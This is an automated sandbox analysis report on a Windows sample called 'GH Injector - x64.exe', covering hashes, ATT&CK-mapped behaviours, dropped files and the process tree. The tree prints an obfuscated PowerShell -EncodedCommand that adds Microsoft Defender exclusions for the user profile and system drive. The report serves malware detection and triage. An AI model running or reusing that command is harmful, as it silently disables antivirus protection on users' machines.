5eff807aef63234dca6d7b09f0f5e06807b298f3749684d66f121aba0462f509

General

Target

ga/GH Injector - x64.exe
Size

962KB
MD5

7b7520a789158423fc9220782c162f6e
SHA1

2a97699729e9ee25acd1b9bc0e94c95cda9d81eb
SHA256

3d4a6a90910f6a00c5e5ca861d348cfb1235e88335f8c3494f63d7a94ca92e5b
SHA512

bbb8a46c4efc05fb278614466dc5acd7a1e695ec485b7de0dc56a31bd8ad8090af0ba67e53b94095f432f3c640d393d1424d7fd48bbe00f5b44f3ad541174bc3
SSDEEP

24576:TB5/LBCgO5AMWe5bUESA8IzqOj865JAZ1NX1YHLi+dr:dNLBCgX3pESAHzqO8aAZ1d1qGm

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2736	GH Injector - x64.exe
2712	GH Injector -x64.exe

Loads dropped DLL 1 IoCs

pid	Process
2208	GH Injector - x64.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 14 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral5/memory/2736-44-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-46-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-47-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-48-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-49-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-50-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-52-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-53-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-54-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-55-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-56-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-57-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-58-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe
behavioral5/memory/2736-59-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	autoit_exe

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral5/files/0x000d000000012262-2.dat	upx
behavioral5/memory/2736-9-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-44-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-46-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-47-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-48-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-49-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-50-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-52-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-53-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-54-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-55-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-56-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-57-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-58-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx
behavioral5/memory/2736-59-0x000000013FAC0000-0x000000013FCC8000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\GH Injector -x64.exe	GH Injector - x64.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GH Injector - x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_Classes\Local Settings	GH Injector - x64.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	GH Injector - x64.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	GH Injector - x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	GH Injector - x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	GH Injector - x64.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2824	powershell.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe
2736	GH Injector - x64.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2736	GH Injector - x64.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	GH Injector - x64.exe
Token: SeDebugPrivilege	2824	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2736	GH Injector - x64.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2208 wrote to memory of 2824	2208	GH Injector - x64.exe	30
PID 2208 wrote to memory of 2824	2208	GH Injector - x64.exe	30
PID 2208 wrote to memory of 2824	2208	GH Injector - x64.exe	30
PID 2208 wrote to memory of 2824	2208	GH Injector - x64.exe	30
PID 2208 wrote to memory of 2736	2208	GH Injector - x64.exe	32
PID 2208 wrote to memory of 2736	2208	GH Injector - x64.exe	32
PID 2208 wrote to memory of 2736	2208	GH Injector - x64.exe	32
PID 2208 wrote to memory of 2736	2208	GH Injector - x64.exe	32
PID 2208 wrote to memory of 2712	2208	GH Injector - x64.exe	33
PID 2208 wrote to memory of 2712	2208	GH Injector - x64.exe	33
PID 2208 wrote to memory of 2712	2208	GH Injector - x64.exe	33
PID 2208 wrote to memory of 2712	2208	GH Injector - x64.exe	33
PID 2712 wrote to memory of 1788	2712	GH Injector -x64.exe	35
PID 2712 wrote to memory of 1788	2712	GH Injector -x64.exe	35
PID 2712 wrote to memory of 1788	2712	GH Injector -x64.exe	35

C:\Users\Admin\AppData\Local\Temp\ga\GH Injector - x64.exe
"C:\Users\Admin\AppData\Local\Temp\ga\GH Injector - x64.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAegBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAaQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAcABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcQBqACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- C:\Users\Admin\AppData\Local\Temp\GH Injector - x64.exe
  "C:\Users\Admin\AppData\Local\Temp\GH Injector - x64.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2736
- C:\Windows\GH Injector -x64.exe
  "C:\Windows\GH Injector -x64.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2712 -s 536
    3⤵
    PID:1788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GH Injector Config.ini

Filesize
311B

MD5
22bb053a188104dbe2719b065983ab95

SHA1
6d9110f084d90f151488b40557e1b1272b5585d2

SHA256
e4455b9f7e2e93a42f2417fbed02dc627e494d05b25e351ddf22ed44007171d9

SHA512
aec77c653acfc7909ff760c9b00c17f2018002238d8876d8c35194957f41fd72ce743fc168dcbf094fbc5cf9102080dfa07809af72a269ff03652addbed9dbc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\lul.ico

Filesize
3KB

MD5
afe12d056a366120354187a282ba6e93

SHA1
4bd885e6c703b3ba0cec7384132b1ffed721d3c5

SHA256
a9fb2f20bc7584e4a922c454f858b2caf359c10aaf06bd5fa61bb3e86b3f8733

SHA512
f688677ff52ecf06f17e7c4c1cf98789d13d95c7c1a9018d3980388dd7d68d7a36b9c3caaec307290f14275cd265e156da63116fc1db5daecad4b583d1868a80

Download Submit
C:\Windows\GH Injector -x64.exe

Filesize
25KB

MD5
9d8778d72a7164e2f1454e534cbf840b

SHA1
0f07264ab1041678fb073e06f87f8422af70888b

SHA256
2ecec062acf259188cabbd41992be4c20ceb092cf7d817b0cc32211b29c55af2

SHA512
0f8a39d286be8fd1bec7fbeb4d56c368d68c7efc5787cee059b28547139ae38487a12093884f7560a58bc52a2bfd75bf81157cb6ace7eb5cac76f982c1320558

Download Submit
\Users\Admin\AppData\Local\Temp\GH Injector - x64.exe

Filesize
927KB

MD5
fac188061068468b413905c05ffe4a2e

SHA1
bc5159c4a2aabc8b138fd28da099c5c6e4e87c86

SHA256
16ac233c0be5784cf4b3bb0b3c94a9732609c6725d3982736280f04195d5304a

SHA512
3750a9e46d0d43e95e2369996661bc0c82511242c79d2aacd4e09455bba3abb8fa6eaf51880875d75cb920543108a5c8c8ebf6c0ea4fcf05a99eb40a6dd2357b

Download Submit
memory/2208-7-0x0000000002930000-0x0000000002B38000-memory.dmp

Filesize
2.0MB

Download
memory/2712-34-0x0000000000C90000-0x0000000000C9C000-memory.dmp

Filesize
48KB

Download
memory/2736-47-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-50-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-44-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-46-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-9-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-48-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-49-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-43-0x0000000007EC0000-0x0000000007ED0000-memory.dmp

Filesize
64KB

Download
memory/2736-52-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-53-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-54-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-55-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-56-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-57-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-58-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download
memory/2736-59-0x000000013FAC0000-0x000000013FCC8000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing